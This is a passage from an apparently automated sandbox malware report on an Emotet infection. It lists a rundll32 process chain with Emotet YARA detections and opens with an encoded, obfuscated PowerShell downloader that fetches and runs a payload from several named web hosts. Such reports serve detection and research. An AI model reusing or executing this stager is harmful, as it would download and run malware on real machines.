G8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA
                                                    Imagebase:0x13f3a0000
                                                    File size:473600 bytes
                                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:high

                                                    Analysis Process: rundll32.exe PID: 2304 Parent PID: 1552

                                                    General

                                                    Start time:09:30:45
                                                    Start date:27/01/2021
                                                    Path:C:\Windows\System32\rundll32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                                                    Imagebase:0xff4a0000
                                                    File size:45568 bytes
                                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    Analysis Process: rundll32.exe PID: 2748 Parent PID: 2304

                                                    General

                                                    Start time:09:30:45
                                                    Start date:27/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                                                    Imagebase:0xbc0000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2099609589.00000000002E0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2099871520.0000000000510000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2099349373.0000000000240000.00000040.00020000.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Analysis Process: rundll32.exe PID: 2728 Parent PID: 2748

                                                    General

                                                    Start time:09:30:46
                                                    Start date:27/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                                                    Imagebase:0xbc0000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102026803.00000000002D0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102360231.0000000000990000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2101833824.0000000000230000.00000040.00020000.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Analysis Process: rundll32.exe PID: 2812 Parent PID: 2728

                                                    General

                                                    Start time:09:30:47
                                                    Start date:27/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp
                                                    Imagebase:0xbc0000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103817256.0000000000770000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103543445.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103566665.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Analysis Process: rundll32.exe PID: 2876 Parent PID: 2812

                                                    General

                                                    Start time:09:30:48
                                                    Start date:27/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1
                                                    Imagebase:0xbc0000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2106310017.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2106250328.0000000000160000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2111292152.0000000000B10000.00000040.00020000.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Analysis Process: rundll32.exe PID: 2908 Parent PID: 2876

                                                    General

                                                    Start time:09:30:49
                                                    Start date:27/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW
                                                    Imagebase:0xbc0000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2110427728.00000000002A0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2110654197.0000000000750000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2110403391.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Analysis Process: rundll32.exe PID: 912 Parent PID: 2908

                                                    General

                                                    Start time:09:30:50
                                                    Start date:27/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1
                                                    Imagebase:0xbc0000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2112160359.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2112213482.00000000002B0000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2112133272.0000000000180000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Analysis Process: rundll32.exe PID: 1616 Parent PID: 912

                                                    General

                                                    Start time:09:30:52
                                                    Start date:27/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO
                                                    Imagebase:0xbc0000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2114550082.00000000007B0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2114093455.0000000000710000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2113942317.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Analysis Process: rundll32.exe PID: 2492 Parent PID: 1616

                                                    General

                                                    Start time:09:30:52
                                                    Start date:27/01/2021
                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1
                                                    Imagebase:0xbc0000
                                                    File size:44544 bytes
                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2340258197.0000000000740000.00000040.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2340368896.00000000007E0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2340125586.0000000000300000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >